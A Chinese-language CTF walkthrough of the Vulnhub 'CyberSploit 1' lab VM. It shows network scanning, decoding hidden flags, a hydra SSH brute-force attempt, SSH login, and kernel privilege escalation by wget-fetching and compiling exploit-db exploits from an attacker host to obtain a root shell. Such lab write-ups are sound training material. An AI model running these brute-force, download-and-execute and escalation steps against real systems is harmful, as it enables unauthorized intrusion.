CyberSploit
靶机信息
名称:cybersploit 1
识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:72:62:36 1 60 PCS Systemtechnik GmbH
192.168.56.176 08:00:27:df:60:2f 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.176
NMAP扫描
──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.176 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-16 20:52 EST
Nmap scan report for localhost (192.168.56.176)
Host is up (0.00020s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 01:1b:c8:fe:18:71:28:60:84:6a:9f:30:35:11:66:3d (DSA)
| 2048 d9:53:14:a3:7f:99:51:40:3f:49:ef:ef:7f:8b:35:de (RSA)
|_ 256 ef:43:5b:d0:c0:eb:ee:3e:76:61:5c:6d:ce:15:fe:7e (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Hello Pentester!
|_http-server-header: Apache/2.2.22 (Ubuntu)
MAC Address: 08:00:27:DF:60:2F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.14 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、80(HTTP)
获得Shell
浏览器访问80端口,返回页面源代码中有注释:
</pre>
<!-------------username:itsskv--------------------->
</body>
</html>
这是SSH的用户名?可以hydra破解?暂时搁置,看一下通过目录扫描是否有更多信息?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ curl http://192.168.56.176/robots.txt
R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9
┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ echo 'R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9' | base64 -d
Good Work !
Flag1: cybersploit{youtube.com/c/cybersploit}
得到第1个Flag。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ nikto -h http://192.168.56.176
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.176
+ Target Hostname: 192.168.56.176
+ Target Port: 80
+ Start Time: 2023-01-16 20:56:42 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 153327, size: 2333, mtime: Sat Jun 27 00:46:41 2020
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2023-01-16 20:57:17 (GMT-5) (35 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ gobuster dir -u http://192.168.56.176 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.176
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/01/16 20:57:55 Starting gobuster in directory enumeration mode
===============================================================
/index (Status: 200) [Size: 2333]
/robots (Status: 200) [Size: 79]
/hacker (Status: 200) [Size: 3757743]
/server-status (Status: 403) [Size: 295]
Progress: 220320 / 220561 (99.89%)
===============================================================
2023/01/16 20:59:35 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ gobuster dir -u http://192.168.56.176 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.176
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: txt,sh,php,html
[+] Timeout: 10s
===============================================================
2023/01/16 21:00:35 Starting gobuster in directory enumeration mode
===============================================================
/index (Status: 200) [Size: 2333]
/index.html (Status: 200) [Size: 2333]
/.html (Status: 403) [Size: 287]
/robots.txt (Status: 200) [Size: 79]
/robots (Status: 200) [Size: 79]
/hacker (Status: 200) [Size: 3757743]
/.html (Status: 403) [Size: 287]
/server-status (Status: 403) [Size: 295]
Progress: 1101828 / 1102805 (99.91%)
===============================================================
2023/01/16 21:09:45 Finished
====================================================
其中hacker目录中含有一个图片(GIF格式),在继续尝试其他字典或者工具进行目录扫描,看是不是可以先破解一下SSH密码?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ hydra -l itsskv -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.176
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-16 21:11:40
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.176:22/
[STATUS] 78.00 tries/min, 78 tries in 00:01h, 14344327 to do in 3065:02h, 10 active
[STATUS] 72.00 tries/min, 216 tries in 00:03h, 14344189 to do in 3320:25h, 10 active
[STATUS] 66.57 tries/min, 466 tries in 00:07h, 14343939 to do in 3591:07h, 10 active
^C^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
没有破解出来。
晕,flag1得到就是SSH密码,看起来真心不像密码呀,难怪破解不出来
┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ ssh [email protected]
The authenticity of host '192.168.56.176 (192.168.56.176)' can't be established.
ECDSA key fingerprint is SHA256:19IzxsJJ/ZH00ix+vmS6+HQqDcXtk9k30aT3K643kSs.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.176' (ECDSA) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686)
* Documentation: https://help.ubuntu.com/
332 packages can be updated.
273 updates are security updates.
New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Your Hardware Enablement Stack (HWE) is supported until April 2017.
Last login: Sat Jun 27 10:14:39 2020 from cybersploit.local
itsskv@cybersploit-CTF:~$ id
uid=1001(itsskv) gid=1001(itsskv) groups=1001(itsskv)
itsskv@cybersploit-CTF:~$ ls -alh
total 156K
drwxr-xr-x 20 itsskv itsskv 4.0K Jun 27 2020 .
drwxr-xr-x 4 root root 4.0K Jun 25 2020 ..
-rw------- 1 itsskv itsskv 233 Jun 27 2020 .bash_history
-rw-r--r-- 1 itsskv itsskv 220 Jun 25 2020 .bash_logout
-rw-r--r-- 1 itsskv itsskv 3.5K Jun 25 2020 .bashrc
drwx------ 14 itsskv itsskv 4.0K Jun 25 2020 .cache
drwx------ 9 itsskv itsskv 4.0K Jun 25 2020 .config
drwx------ 3 itsskv itsskv 4.0K Jun 25 2020 .dbus
drwxr-xr-x 2 itsskv itsskv 4.0K Jun 25 2020 Desktop
-rw-r--r-- 1 itsskv itsskv 25 Jun 26 2020 .dmrc
drwxr-xr-x 2 itsskv itsskv 4.0K Jun 25 2020 Documents
drwxr-xr-x 2 itsskv itsskv 4.0K Jun 25 2020 Downloads
-rw-r--r-- 1 itsskv itsskv 8.3K Jun 25 2020 examples.desktop
-rw-rw-r-- 1 itsskv itsskv 495 Jun 27 2020 flag2.txt
drwx------ 3 itsskv itsskv 4.0K Jun 26 2020 .gconf
drwx------ 4 itsskv itsskv 4.0K Jun 25 2020 .gnome2
-rw-rw-r-- 1 itsskv itsskv 142 Jun 26 2020 .gtk-bookmarks
drwx------ 2 itsskv itsskv 4.0K Jun 25 2020 .gvfs
-rw------- 1 itsskv itsskv 1.1K Jun 26 2020 .ICEauthority
drwxr-xr-x 3 itsskv itsskv 4.0K Jun 25 2020 .local
drwx------ 3 itsskv itsskv 4.0K Jun 25 2020 .mission-control
drwx------ 4 itsskv itsskv 4.0K Jun 25 2020 .mozilla
drwxr-xr-x 2 itsskv itsskv 4.0K Jun 25 2020 Music
drwxr-xr-x 2 itsskv itsskv 4.0K Jun 25 2020 Pictures
-rw-r--r-- 1 itsskv itsskv 675 Jun 25 2020 .profile
drwxr-xr-x 2 itsskv itsskv 4.0K Jun 25 2020 Public
drwx------ 2 itsskv itsskv 4.0K Jun 26 2020 .pulse
-rw------- 1 itsskv itsskv 256 Jun 25 2020 .pulse-cookie
drwxr-xr-x 2 itsskv itsskv 4.0K Jun 25 2020 Templates
drwxr-xr-x 2 itsskv itsskv 4.0K Jun 25 2020 Videos
-rw------- 1 itsskv itsskv 0 Jun 26 2020 .Xauthority
-rw------- 1 itsskv itsskv 12K Jun 26 2020 .xsession-errors
-rw------- 1 itsskv itsskv 14K Jun 26 2020 .xsession-errors.old
itsskv@cybersploit-CTF:~$ cat flag2.txt
01100111 01101111 01101111 01100100 00100000 01110111 01101111 01110010 01101011 00100000 00100001 00001010 01100110 01101100 01100001 01100111 00110010 00111010 00100000 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 01111011 01101000 01110100 01110100 01110000 01110011 00111010 01110100 00101110 01101101 01100101 00101111 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 00110001 01111101
itsskv@cybersploit-CTF:~$
用cyberchef工具解码(binary)
good work !
flag2: cybersploit{https:t.me/cybersploit1}
提权
将linpeas脚本上传至目标主机/tmp目录,修改权限,并执行脚本:
╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
[1] exploit_x
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[2] overlayfs
CVE-2015-8660
Source: http://www.exploit-db.com/exploits/39230
[3] pp_key
CVE-2016-0728
Source: http://www.exploit-db.com/exploits/39277
[4] timeoutpwn
CVE-2014-0038
Source: http://www.exploit-db.com/exploits/31346
itsskv@cybersploit-CTF:/tmp$ chmod +x linpeas.sh
itsskv@cybersploit-CTF:/tmp$ wget http://192.168.56.146:8000/39230.c
--2023-01-17 08:55:20-- http://192.168.56.146:8000/39230.c
Connecting to 192.168.56.146:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8487 (8.3K) [text/x-csrc]
Saving to: `39230.c'
100%[====================================================================================>] 8,487 --.-K/s in 0s
2023-01-17 08:55:20 (40.2 MB/s) - `39230.c' saved [8487/8487]
itsskv@cybersploit-CTF:/tmp$ gcc -o exploit 39230.c
itsskv@cybersploit-CTF:/tmp$ chmod +x ./exploit
itsskv@cybersploit-CTF:/tmp$ ./exploit
Failed to open setgroups
itsskv@cybersploit-CTF:/tmp$ euid: 65534, egid: 65534
id
uid=1001(itsskv) gid=1001(itsskv) groups=1001(itsskv)
itsskv@cybersploit-CTF:/tmp$ ./exploit
Failed to open setgroups
itsskv@cybersploit-CTF:/tmp$ euid: 65534, egid: 65534
id
uid=1001(itsskv) gid=1001(itsskv) groups=1001(itsskv)
itsskv@cybersploit-CTF:/tmp$
执行失败。
itsskv@cybersploit-CTF:/tmp$ wget http://192.168.56.146:8000/37292.c
--2023-01-17 09:00:00-- http://192.168.56.146:8000/37292.c
Connecting to 192.168.56.146:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: `37292.c'
100%[====================================================================================>] 4,968 --.-K/s in 0s
2023-01-17 09:00:00 (684 MB/s) - `37292.c' saved [4968/4968]
itsskv@cybersploit-CTF:/tmp$ gcc -o exploit2 37292.c
itsskv@cybersploit-CTF:/tmp$ chmod +x exploit2
itsskv@cybersploit-CTF:/tmp$ ./exploit2
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# cd /root
# ls -alh
total 40K
drwx------ 5 root root 4.0K Jun 27 2020 .
drwxr-xr-x 23 root root 4.0K Jun 25 2020 ..
-rw------- 1 root root 705 Jun 27 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Apr 19 2012 .bashrc
drwx------ 3 root root 4.0K Jun 27 2020 .cache
drwx------ 3 root root 4.0K Jun 27 2020 .dbus
-rw-r--r-- 1 root root 140 Apr 19 2012 .profile
drwx------ 2 root root 4.0K Jan 17 07:20 .pulse
-rw------- 1 root root 256 Jun 25 2020 .pulse-cookie
-rw-r--r-- 1 root root 1.2K Jun 27 2020 finalflag.txt
# cat finalflag.txt
______ ____ ____ .______ _______ .______ _______..______ __ ______ __ .___________.
/ |\ \ / / | _ \ | ____|| _ \ / || _ \ | | / __ \ | | | |
| ,----' \ \/ / | |_) | | |__ | |_) | | (----`| |_) | | | | | | | | | `---| |----`
| | \_ _/ | _ < | __| | / \ \ | ___/ | | | | | | | | | |
| `----. | | | |_) | | |____ | |\ \----.----) | | | | `----.| `--' | | | | |
\______| |__| |______/ |_______|| _| `._____|_______/ | _| |_______| \______/ |__| |__|
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _
/ \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \
( c | o | n | g | r | a | t | u | l | a | t | i | o | n | s )
\_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/
flag3: cybersploit{Z3X21CW42C4 many many congratulations !}
if you like it share with me https://twitter.com/cybersploit1.
Thanks !
#
利用了另外一个漏洞利用脚本,可以成功提权。
标签:itsskv,25,4.0,Jun,192.168,2020,Vulnhub,靶机,CyberSploit From: https://www.cnblogs.com/jason-huawen/p/17057471.html